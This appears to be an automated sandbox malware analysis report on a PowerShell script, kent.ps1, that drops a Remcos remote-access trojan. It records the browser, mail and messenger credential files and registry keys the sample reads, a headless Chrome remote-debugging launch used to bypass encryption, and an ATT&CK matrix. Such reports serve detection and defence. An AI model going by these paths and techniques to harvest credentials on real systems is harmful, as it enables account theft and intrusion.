Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle, explorer.exe

6_2_10007360

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_004197D9 mouse_event,

6_2_004197D9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gogzsxemgwpfijwqnpyiza"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\iqlksqofuehskykceakkkmhvt"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\tkrctizhimzxveggnlfdvrbmcaxfu"	Jump to behavior

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3959979865.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3959743316.0000000001558000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3960690898.000000000441D000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3960870936.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00435034 cpuid

6_2_00435034

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoA,	6_2_0040F26B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	6_2_004520E2
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	6_2_00452097
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	6_2_0045217D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	6_2_0045220A
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	6_2_0044844E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,	6_2_0045245A
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_00452583
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,	6_2_0045268A
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_00452757
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,	6_2_00448937
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	6_2_00451E1F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\kent.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00404961 GetLocalTime,CreateEventA,CreateThread,

6_2_00404961

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0041BB0E GetComputerNameExW,GetUserNameW,

6_2_0041BB0E

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

6_2_004491DA

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_004192F2 GetVersionExW,

9_2_004192F2

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3959743316.0000000001558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

6_2_0040B59B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		6_2_0040B6B5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: \key3.db		6_2_0040B6B5

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\recover.exe	Code function: ESMTPPassword	10_2_004033F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	10_2_00402DB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	10_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 9.2.recover.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.49c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.recover.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.49c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: recover.exe PID: 7052, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-U6XQL5

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3959743316.0000000001558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: cmd.exe

6_2_00405091

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	22 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	111 Input Capture	11 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	Logon Script (Windows)	1 Extra Window Memory Injection	4 Obfuscated Files or Information	2 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Access Token Manipulation	12 Software Packing	3 Credentials In Files	4 File and Directory Discovery	Distributed Component Object Model	111 Input Capture	2 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Windows Service	1 Timestomp	LSA Secrets	38 System Information Discovery	SSH	3 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	422 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Bypass User Account Control	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	31 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	422 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kent.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
kent.ps1